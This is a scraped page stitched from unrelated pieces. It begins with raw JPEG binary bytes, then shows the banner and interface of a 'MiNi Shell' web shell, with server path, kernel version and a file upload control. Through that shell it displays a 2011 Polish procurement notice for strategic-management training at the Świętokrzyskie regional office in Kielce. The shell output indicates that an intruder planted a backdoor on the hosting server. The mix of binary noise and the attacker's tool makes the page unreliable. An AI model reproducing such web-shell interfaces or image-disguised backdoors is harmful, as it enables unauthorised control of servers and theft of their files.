JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110419/119283-N-2011.html

<p class="kh_header"><b>Kielce: Organizacja 2 szkoleń związanych z realizacją projektu Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr UMWŚ w Kielcach realizowanego w ramach programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 119283 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja 2 szkoleń związanych z realizacją projektu Rozwój systemu kluczowych obszarów funkcjonowania i kompetencji kadr UMWŚ w Kielcach realizowanego w ramach programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Szczegółowy opis przedmiotu zamówienia 

Moduł I
Przedmiotem zamówienia jest organizacja i przeprowadzenie dla kadry
zarządzającej Urzędu Marszałkowskiego Województwa Świętokrzyskiego 2-dniowego szkolenia z zakresu zarządzania strategicznego

I.	Założenia dotyczące organizacji szkolenia:
1.	Liczba osób szkolonych - 20 pracowników zatrudnionych w Urzędzie Marszałkowskim Województwa Świętokrzyskiego.
2.	Czas trwania szkolenia - 2 dniowe 8 godzinne. Przyjmuje się, że czas jednej godziny lekcyjnej = 45 minutom.
3.	Termin organizacji szkolenia: nie wcześniej niż 1 maja 2011 r. i nie później niż 15 czerwca 2011 r. Szkolenia będą odbywały się zgodnie z Harmonogramem szkolenia, który zostanie przekazany Wykonawcy przez Zamawiającego najpóźniej 14 dni przed terminem rozpoczęciem szkolenia ( chyba, że strony ustalą termin krótszy). 4.	Szkolenie wyjazdowe: 2 dniowe. Zamawiający zastrzega, że szkolenie może być zorganizowane jedynie w dniach, które stanowią dni robocze dla Zamawiającego tj. od poniedziałku do piątku.
5.	Zamawiający wymaga, aby miejsce organizacji szkolenia znajdowało się w promieniu 20 km od granic administracyjnych miasta Kielc, z zastrzeżeniem, że dzień wyjazdu będzie dniem rozpoczynającym pierwszy dzień szkolenia (Zaoferowanie przez Wykonawcę miejsca organizacji szkolenia, które nie będzie spełniało wymagania Zamawiającego w zakresie minimalnej maksymalnej odległości miejsca szkolenia od granic administracyjnych miasta Kielc, spowodowuje odrzucenie oferty wykonawcy na podstawie art. 89 ust. 1 pkt 2 ustawy pzp.).
6.	Wykonawca zapewni uczestnikom zakwaterowanie w trakcie trwania szkolenia.
II.	Materiały szkoleniowe:
1.	W ramach umowy Wykonawca obowiązany jest przygotować materiały szkoleniowe dla wszystkich uczestników szkoleń (jeden komplet dla każdego uczestnika + jeden komplet do archiwum): skrypt autorski trenera, długopis, czarny clipboard zamykany o treści adekwatnej do omawianej tematyki, przygotowane w formie drukowanej i elektronicznej. Na wszystkich materiałach, które otrzymają uczestnicy szkolenia należy zamieścić odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz Logo Unii Europejskiej, wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl
2.	Materiały w formie drukowanej muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione itp.)
3.	Koszty związane z zapewnieniem materiałów szkoleniowych ponosi Wykonawca i należy je wliczyć w cenę oferty.
III.	Zakres tematyki:
1.	Celem szkolenia jest podniesienie świadomości i wiedzy kluczowych osób - uczestników procesu zarządzania strategicznego na poziomie Urzędu Marszałkowskiego, w zakresie fundamentalnych zadań i obowiązków związanych z przedmiotowym sposobem zarządzania przestrzenią publiczną. 
Zakres tematyczny szkolenia powinien obejmować: 
a.	Zarządzanie strategiczne - podstawowe informacje
b.	Zarządzanie strategiczne w samorządzie terytorialnym - podstawowe informacje
c.	Analiza otoczenia organizacji - jej wpływ na cele i strategie 
d.	Określenie strategicznej misji organizacji 
e.	Ustalenie celów strategicznych oraz zadań operacyjnych
f.	Sformułowanie planu strategicznego umożliwiającego zrealizowanie misji i celów
g.	Przykłady misji oraz celów strategicznych w sektorach publicznych
h.	Ustalenie strategii działania oraz środków jej realizacji
i.	Analiza strategii wybranej instytucji administracji
j.	Proces tworzenia strategii 
k.	Przykładowe obszary wykorzystania zarządzania strategicznego w administracji publicznej
l.	Wdrażanie i wykonywanie planu strategii
m.	Realizacja strategii organizacji a systemy informatyczne
n.	Ocena sprawności strategicznej i dostosowanie korekcyjne - strategiczna karta wyników
o.	Kontrola w zarządzaniu strategicznym
IV.	Wykonawca zobligowany jest do:
1.	Zorganizowania, przeprowadzenia i obsługi szkolenia dla kadry zarządzającej Urzędu Marszałkowskiego Województwa Świętokrzyskiego.
2.	Zorganizowania szkolenia w zakresie t.j. zakwaterowanie oraz pełne wyżywienie dla 20 osobowej grupy szkoleniowej.
3.	Przygotowania, przeprowadzenia i obsługi szkolenia, zapewnienia materiałów oraz pomocy szkoleniowych, zapewnienie trenera szkolenia oraz osoby będącej kierownikiem (koordynatorem) szkolenia. Osoba ta musi przebywać przez okres trwania szkolenia w miejscu odbywania się zajęć w celu prawidłowej organizacji zajęć i powinna dysponować telefonem komórkowym. 
4.	Trener lub osoba prowadząca zajęcia szkoleniowe, muszą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Stąd też Zamawiający zastrzega sobie, aby osoby zaangażowane w realizację szkolenia dysponowały: wykształceniem wyższym oraz doświadczeniem zawodowym w postaci przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum 1 szkolenia grupowego, odpowiadającego tematyce przedmiotowi zamówienia.
5.	Zapewnienia zakwaterowania uczestnikom szkolenia w trakcie trwania szkolenia - pokoje maksymalnie 2 osobowe z łazienkami, w hotelu minimum trzy gwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie.
6.	Zapewnienie usług gastronomicznych pełnego wyżywienia (śniadanie pełne: szwedzki stół; obiad składający się z dwóch dań, sałatki, napój; kolacje: soki, woda, mleko do kawy, cukier, ciastka lub ciasto - podawanego przez rozpoczęciem zajęć, oraz w przerwie w trakcie trwania zajęć). Zapewnienie usług cateringowych obejmujących koszt zapewnienia wszystkim uczestnikom: kawy, herbaty, mleka do kawy, cukru, wody mineralnej, ciastek. 
7.	Ubezpieczenie uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku , Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego.
8.	Zapewnienie uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia.
9.	Zapewnienia sali szkoleniowej dostosowanej do przeprowadzenia zajęć zarówno teoretycznych jak i praktycznych, dla 20 osób. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać: klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, odpowiedni sprzęt techniczno-dydaktyczny (w szczególności: sprzęt obsługujący płyty CD, laptop, rzutnik multimedialny, stojak lub stół na rzutnik, ekran lub fragment pustej ściany do wyświetlenia, odpowiednie nagłośnienie, flipchard i mazaki). Pomieszczenia muszą spełniać wymogi BHP, akustyczne, oświetleniowe, w okresie zimowym ogrzewane, posiadające zaplecze sanitarne; toaleta dostępna poza salą szkoleniową.
10.	Przygotowania list uczestników szkolenia wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS.
11.	Przygotowania programu szkolenia wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS. Szczegółowy program szkolenia Wykonawca przygotuje i przedstawi do akceptacji Zamawiającemu w terminie nie później niż na 5 dni roboczych przed terminem szkolenia.
12.	Przygotowania ankiet oceny szkolenia dotyczących poziomu zadowolenia uczestników oraz oceny jakości prowadzonych zajęć, tj. oceny kwalifikacji wykładowców/instruktorów, sposobu prowadzenia szkolenia i przekazywania wiedzy, pomocy dydaktycznych, długości zajęć, programu szkoleń itp. wraz odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS, oraz przekazaniu ich Zamawiającemu.
13.	Prowadzenia dokumentacji przebiegu szkolenia stanowiącej (wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS):
a)	Dziennik zajęć edukacyjnych zawierających listę obecności, wymiar godzin i tematy zajęć.
b)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.
c)	Potwierdzenie otrzymania materiałów szkoleniowych.
d)	Potwierdzenie otrzymania cateringu.
14.	Przygotowania materiałów szkoleniowych oraz rozdanie ich uczestnikom szkolenia.
15.	Wydania uczestnikom szkolenia świadectw potwierdzających udział w szkoleniu na drukach których wzór określa Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. W sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. Nr.31 poz. 216) lub równoważnym potwierdzającym uzyskanie kwalifikacji. Zaświadczenie szkolenia powinny zawierać odpowiednie oznaczenie logo PO KL i UE oraz informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
16.	Dostarczyć Zamawiającemu wraz z fakturą za organizację szkolenia w terminie 7 dni od daty przeprowadzenia szkolenia, pełną dokumentację szkolenia (np. kopii dziennika zajęć edukacyjnych, rejestru wydanych zaświadczeń, listy obecności oraz innych wykazów osób, które ukończyły szkolenie i nie ukończyły szkolenia). Kopie muszą być poświadczone za zgodność z oryginałem.
17.	Zamieszczenia informacji o szkoleniu na 5 dni roboczych przed jego rozpoczęciem w internetowej bazie szkoleń, która dostępna jest na stronie: www.inwestycjawkadry.info.pl.

MODUŁ II
Przedmiotem zamówienia jest organizacja i przeprowadzenie dla pracowników zaangażowanych w proces budowy (aktualizacji) dokumentów strategicznych 2-dniowego szkolenia z zakresu zarządzania strategicznego

I.	Założenia dotyczące organizacji szkolenia:
1.	Liczba osób szkolonych - 30 pracowników zatrudnionych w Urzędzie Marszałkowskim Województwa Świętokrzyskiego.
2.	Czas trwania szkolenia - 2 dniowe 8 godzinne. Przyjmuje się, że czas jednej godziny lekcyjnej = 45 minutom.
3.	Termin organizacji szkolenia: nie wcześniej niż 1 maja 2011 r. i nie później niż 15 czerwca 2011 r. Szkolenia będą odbywały się zgodnie z Harmonogramem szkolenia, który zostanie przekazany Wykonawcy przez Zamawiającego najpóźniej 14 dni przed terminem rozpoczęciem szkolenia ( chyba, że strony ustalą termin krótszy).
4.	Szkolenie wyjazdowe: 2 dniowe. Zamawiający zastrzega, że szkolenie może być zorganizowane jedynie w dniach, które stanowią dni robocze dla Zamawiającego tj. od poniedziałku do piątku.
5.	Zamawiający wymaga, aby miejsce organizacji szkolenia znajdowało się w promieniu 20 km od granic administracyjnych miasta Kielc, z zastrzeżeniem, że dzień wyjazdu będzie dniem rozpoczynającym pierwszy dzień szkolenia (Zaoferowanie przez Wykonawcę miejsca organizacji szkolenia, które nie będzie spełniało wymagania Zamawiającego w zakresie minimalnej maksymalnej odległości miejsca szkolenia od granic administracyjnych miasta Kielc, spowodowuje odrzucenie oferty wykonawcy na podstawie art. 89 ust. 1 pkt 2 ustawy pzp.).
6.	Wykonawca zapewni uczestnikom zakwaterowanie w trakcie trwania szkolenia.
II.	Materiały szkoleniowe:

1.	W ramach umowy Wykonawca obowiązany jest przygotować materiały szkoleniowe dla wszystkich uczestników szkoleń (jeden komplet dla każdego uczestnika + jeden komplet do archiwum): skrypt autorski trenera, długopis, czarny clipboard zamykany o treści adekwatnej do omawianej tematyki, przygotowane w formie drukowanej i elektronicznej. Na wszystkich materiałach, które otrzymają uczestnicy szkolenia należy zamieścić odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz Logo Unii Europejskiej, wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki dostępnym na stronie internetowej www.funduszestrukturalne.gov.pl
2.	Materiały w formie drukowanej muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione itp.)
3.	Koszty związane z zapewnieniem materiałów szkoleniowych ponosi Wykonawca i należy je wliczyć w cenę oferty.
III.	Zakres tematyki:
1.	Celem szkolenia jest uzyskanie przez uczestników szkolenia wiedzy w zakresie zarządzania strategicznego, która będzie mogła zostać wykorzystana w procesie budowy (aktualizacji) dokumentów strategicznych.

Zakres tematyczny szkolenia powinien obejmować: 
a.	Zarządzanie strategiczne - podstawowe informacje
b.	Zarządzanie strategiczne w samorządzie terytorialnym - podstawowe informacje
c.	Analiza otoczenia organizacji - jej wpływ na cele i strategie - warsztaty grupowe
d.	Określenie strategicznej misji organizacji 
e.	Ustalenie celów strategicznych oraz zadań operacyjnych
f.	Sformułowanie planu strategicznego umożliwiającego zrealizowanie misji i celów
g.	Przykłady misji oraz celów strategicznych w sektorach publicznych
h.	Ustalenie strategii działania oraz środków jej realizacji
i.	Analiza strategii wybranej instytucji administracji
j.	Proces i zasady tworzenia strategii - warsztaty i dyskusja
- modele strategii rozwoju,
- analiza SWOT,
- definiowanie priorytetów,
k.	Przykładowe obszary wykorzystania zarządzania strategicznego w administracji publicznej
l.	Wdrażanie i wykonywanie planu strategii
m.	Realizacja strategii organizacji a systemy informatyczne
n.	Ocena sprawności strategicznej i dostosowanie korekcyjne - strategiczna karta wyników
o.	Kontrola w zarządzaniu strategicznym
W odróżnieniu od części I zamówienia szkolenie realizowane w ramach części II powinno kłaść nacisk na warsztaty praktyczne i bezpośredni kontakt z ekspertem. 
IV.	Wykonawca zobligowany jest do:
1.	Zorganizowania, przeprowadzenia i obsługi szkolenia dla pracowników Urzędu Marszałkowskiego Województwa Świętokrzyskiego zaangażowanych w proces budowy (aktualizacji) dokumentów strategicznych.
2.	Zorganizowania szkolenia w zakresie t.j. zakwaterowanie oraz pełne wyżywienie dla 30 osobowej grupy szkoleniowej.
3.	Przygotowania, przeprowadzenia i obsługi szkolenia, zapewnienia materiałów oraz pomocy szkoleniowych, zapewnienie trenera szkolenia oraz osoby będącej kierownikiem (koordynatorem) szkolenia. Osoba ta musi przebywać przez okres trwania szkolenia w miejscu odbywania się zajęć w celu prawidłowej organizacji zajęć i powinna dysponować telefonem komórkowym. 
4.	Trener lub osoba prowadząca zajęcia szkoleniowe, muszą posiadać odpowiednie przygotowanie merytoryczne do prowadzenia zajęć powierzonych im przez Wykonawcę. Stąd też Zamawiający zastrzega sobie, aby osoby zaangażowane w realizację szkolenia dysponowały: wykształceniem wyższym oraz doświadczeniem zawodowym w postaci przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert minimum 1 szkolenia grupowego, odpowiadającego tematyce przedmiotowi zamówienia.
5.	Zapewnienia zakwaterowania uczestnikom szkolenia w trakcie trwania szkolenia - pokoje maksymalnie 2 osobowe z łazienkami, w hotelu minimum trzy gwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie.
6.	Zapewnienie usług gastronomicznych pełnego wyżywienia (śniadanie pełne: szwedzki stół; obiad składający się z dwóch dań, sałatki, napój; kolacje: soki, woda, mleko do kawy, cukier, ciastka lub ciasto - podawanego przez rozpoczęciem zajęć, oraz w przerwie w trakcie trwania zajęć). Zapewnienie usług cateringowych obejmujących koszt zapewnienia wszystkim uczestnikom: kawy, herbaty, mleka do kawy, cukru, wody mineralnej, ciastek. 
7.	Ubezpieczenie uczestników szkolenia od Następstw Nieszczęśliwych Wypadków od pierwszego do ostatniego dnia szkolenia. W razie wystąpienia wypadku , Wykonawca będzie zobowiązany do sporządzenia protokołu okoliczności i przyczyn wypadku związanego ze szkoleniem w drodze do i z miejsca szkolenia powstałego z udziałem pracownika UMWŚ skierowanego na szkolenie przez Zamawiającego.
8.	Zapewnienie uczestnikom szkolenia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia.
9.	Zapewnienia sali szkoleniowej dostosowanej do przeprowadzenia zajęć zarówno teoretycznych jak i praktycznych, dla 30 osób. Sala szkoleniowa musi spełniać standardy szkoleniowe tj. posiadać: klimatyzację, odpowiednie oświetlenie, biurka lub stoły dla uczestników szkolenia, krzesła, odpowiedni sprzęt techniczno-dydaktyczny (w szczególności: sprzęt obsługujący płyty CD, laptop, rzutnik multimedialny, stojak lub stół na rzutnik, ekran lub fragment pustej ściany do wyświetlenia, odpowiednie nagłośnienie, flipchard i mazaki). Pomieszczenia muszą spełniać wymogi BHP, akustyczne, oświetleniowe, w okresie zimowym ogrzewane, posiadające zaplecze sanitarne; toaleta dostępna poza salą szkoleniową.
10.	Przygotowania list uczestników szkolenia wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS.
11.	Przygotowania programu szkolenia wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS. Szczegółowy program szkolenia Wykonawca przygotuje i przedstawi do akceptacji Zamawiającemu w terminie nie później niż na 5 dni roboczych przed terminem szkolenia.
12.	Przygotowania ankiet oceny szkolenia dotyczących poziomu zadowolenia uczestników oraz oceny jakości prowadzonych zajęć, tj. oceny kwalifikacji wykładowców/instruktorów, sposobu prowadzenia szkolenia i przekazywania wiedzy, pomocy dydaktycznych, długości zajęć, programu szkoleń itp. wraz odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS, oraz przekazaniu ich Zamawiającemu.
13.	Prowadzenia dokumentacji przebiegu szkolenia stanowiącej (wraz z odpowiednim oznaczeniem logo PO KL i UE oraz informacją o współfinansowaniu ze środków Unii Europejskiej w ramach EFS):
a)	Dziennik zajęć edukacyjnych zawierających listę obecności, wymiar godzin i tematy zajęć.
b)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.
c)	Potwierdzenie otrzymania materiałów szkoleniowych.
d)	Potwierdzenie otrzymania cateringu.
14.	Przygotowania materiałów szkoleniowych oraz rozdanie ich uczestnikom szkolenia.
15.	Wydania uczestnikom szkolenia świadectw potwierdzających udział w szkoleniu na drukach których wzór określa Rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. W sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. Nr.31 poz. 216) lub równoważnym potwierdzającym uzyskanie kwalifikacji. Zaświadczenie szkolenia powinny zawierać odpowiednie oznaczenie logo PO KL i UE oraz informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
16.	Dostarczyć Zamawiającemu wraz z fakturą za organizację szkolenia w terminie 7 dni od daty przeprowadzenia szkolenia, pełną dokumentację szkolenia (np. kopii dziennika zajęć edukacyjnych, rejestru wydanych zaświadczeń, listy obecności oraz innych wykazów osób, które ukończyły szkolenie i nie ukończyły szkolenia). Kopie muszą być poświadczone za zgodność z oryginałem.
17.	Zamieszczenia informacji o szkoleniu na 5 dni roboczych przed jego rozpoczęciem w internetowej bazie szkoleń, która dostępna jest na stronie: www.inwestycjawkadry.info.pl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie Wykonawcy, którzy posiadają odpowiednią wiedzę i
doświadczenie niezbędne do wykonania zamówienia, tj. w ciągu ostatnich trzech lat przed
upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali
należycie: minimum jedną usługę polegającą na przeprowadzeniu szkolenia z zarządzania strategicznego w administracji publicznej, którego wartość wynosi co najmniej 15000,00zł brutto dla
minimum 10 osób. Zamawiający oceni spełnianie tego warunku na podstawie wykazu usług
złożonego przez Wykonawcę wg wzoru stanowiącego dodatek nr 2B do SIWZ (wykaz usług )
oraz na podstawie załączonego do wykazu dokumentu potwierdzającego, że usługa ta została
wykonana należycie (oryginał lub kopie poświadczone za zgodność z oryginałem przez wykonawcę), metodą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie Wykonawcy, którzy dysponują lub będą dysponować
odpowiednim potencjałem technicznym niezbędnym do realizacji zamówienia. Zamawiający
oceni spełnianie tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o
spełnianiu warunków udziału w postępowaniu, (art. 22 ust. 1 ustawy) - wg wzoru określonego w
dodatku nr 2A do SIWZ - oryginał, metoda spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie Wykonawcy, którzy dysponują lub będą dysponować
osobami zdolnymi do wykonania zamówienia, tj. minimum jeden trener posiadający
